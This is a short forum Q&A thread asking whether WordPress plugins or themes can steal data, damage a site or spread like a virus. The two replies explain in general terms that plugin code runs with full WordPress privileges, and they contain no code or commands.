Can a WordPress plugin or theme contain a virus?

Is it possible to write a virus in a form of a WordPress plugin/theme?

Is it possible to:

Read More
  • steal user data?
  • damage existing WordPress installation?
  • (optionally) self-spread the virus?

Are there any existing cases of this kind of viruses?

Related posts

Leave a Reply

2 comments

  1. When you write PHP code, you can do just about anything. So when you run the code of a plugin it can do just about anything as well.

    • It can query the database and get whatever info is there (which is why it’s a good idea to store passwords as hashes.)
    • Since it can query the database, it can also delete anything in the database, ruining settings, turning off plugins etc.
    • Plugins can send out info the normal way, mail, http, so spreading a virus will be hard if the receiver has good protection.

    Depending on your server setup, a plugin can take over your server. If you allow it, to download files that it can execute, it would be able to download any code, that it would be able to run in your server. If the user running the code has enough privileges, it can do stuff like changing the password effectively shutting you out of the server.

    But all of this, will be easy to spot, so if a lot of people are using it, you should be safe to download and use it, since expert PHP developers, would have found out about it.

    So short answer is, yes almost anything is possible, but the dangers are not that great. If you use popular pluings.

    I think a bigger danger, would be that the plugin is poorly written, and will accidentally create a security risk, like not validating user provided data etc.

  2. Yes. Yes. Yes.

    All of these are not only possible, but also easily encountered in the wild. There had been whole waves of self-spreading WordPress malware for some older insecure versions.

    Everything WordPress has access to – any theme or plugin has access as well. Stealing or ruining data is trivial for code running as WP extensions.